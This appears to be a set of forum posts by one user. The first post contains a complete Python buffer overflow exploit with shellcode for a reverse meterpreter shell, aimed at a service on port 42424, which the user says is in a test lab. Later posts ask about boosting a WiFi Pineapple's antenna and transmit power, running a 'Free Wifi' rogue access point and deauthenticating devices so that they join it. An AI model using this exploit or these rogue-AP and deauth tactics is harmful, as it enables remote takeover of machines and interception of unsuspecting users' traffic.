confuscious1080

Hi I am attempting to exploit a remote buffer overflow as part of a test lab environment. The exploit works fine in a Windows 7 test VM and i can get a reverse meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM. However when I attempt this in the test environment against the machine that I know is running the application on port 42424 I do not get the reverses shell now i have tried this with both x86 and x64 shellcode, if i test locally on the Kali machine i can crash the application but again also do not get a shell my exploit code is below #!/usr/bin/env python2 import socket ServiceManagerIP = "127.0.0.1" ServiceManagerPort = 42424 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ServiceManagerIP, ServiceManagerPort)) payload = "\xc3"*146 #Junk Bytes #77E9F7DF payload += "\xDF\xF7\xE9\x77" + "\x90" *16 #Shellcode to be executed by application payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1" "\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7" "\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17" "\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05" "\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40" "\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92" "\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a" "\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4" "\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b" "\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb" "\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38" "\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7" "\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80" "\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5" "\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a" "\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3" "\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c" "\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa" "\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d" "\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80" "\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb" "\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62" "\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75" "\x35\x96\xaf\x2a\x36\xb3") s.send(payload+"\r\n") data = s.recv(len(msg)) s.recv(1024) s.close() print data

Ah okay thanks a lot for your help

do you know where i can order this in the UK i presume from the ALFA site shipping from the Hak5 store takes ages as its coming from America

Oh so this is what I needed an actual amplfier lol i just ordered two of the 7dbi alfa antennas and made no difference I will also buy this additional amplifier as well

Ah okay well I also followed the instructions and ran the tx power unlocker script but it has not worked or upgraded the txpower at all for any interface.

Checked my Free Wifi Access Point as well that my clients will connect to which I guess is the actual one that matters and the signal strength for that is only 18 dbmi I live in the UK could this be because of law restrictions have to be under 20 dbmi??

When I connect to my Management AP of the Wifi Pineapple not the one configured for clients to connect to i only have a signal strength of 26 dbm compared to my actual BT router access point which is at 65 dbm this is also with one of the Alfa 7dbi antennas connected up to the Wifi Pineapple

Ah yes that makes sense that having a bigger antenna will not increase the chipsets output power for the device is there a way to increase this as well in Kali Linux ive tried the whole iw reg thing with the command line but I have my suspicions that it is not actually doing anything

My tx power is still 22 dbm as well on the wlan0 interface in Kali got the antenna working how do I take advantage of the 7bi that I have

Hi I recently got one of these from ebay to go on my NANO Basic piece of kit. I noticed that they sell them on the Hak5 website as well. So I took off the basics antenna and put on the alpha and ran the shell script to configure the pineapple got the site address logged in tried a recon scan and nothing at all could not scan, is their something else I need to do to configure it the antenna came with no drivers or anything i thought i could just screw it on the Pineapple and I would be away.

hmm I am not sure whether to buy it from China on ebay :p might just get this Details about Alfa Network APA-M04 2.4GHz 7 dBi high gain directional indoor panel antenna wi

Was thinking of getting 5.8GHz 16dBi Outdoor Directional Yagi Antenna With N-Female For Signal Booster from China lol Will it fit on the Wifi Pineapple though and would it melt it.... lol

nope i just have the Pineapple not the SD card that comes with it yeah think its because ive run out of space on the Pineapple

I have my android device connected up now been using DWALL on it trying to use nmap but for some reason the Pineapple will not install the dependencies

But i thought if you could deauth a MAC off of a router first then you could get them to connect to you afterwards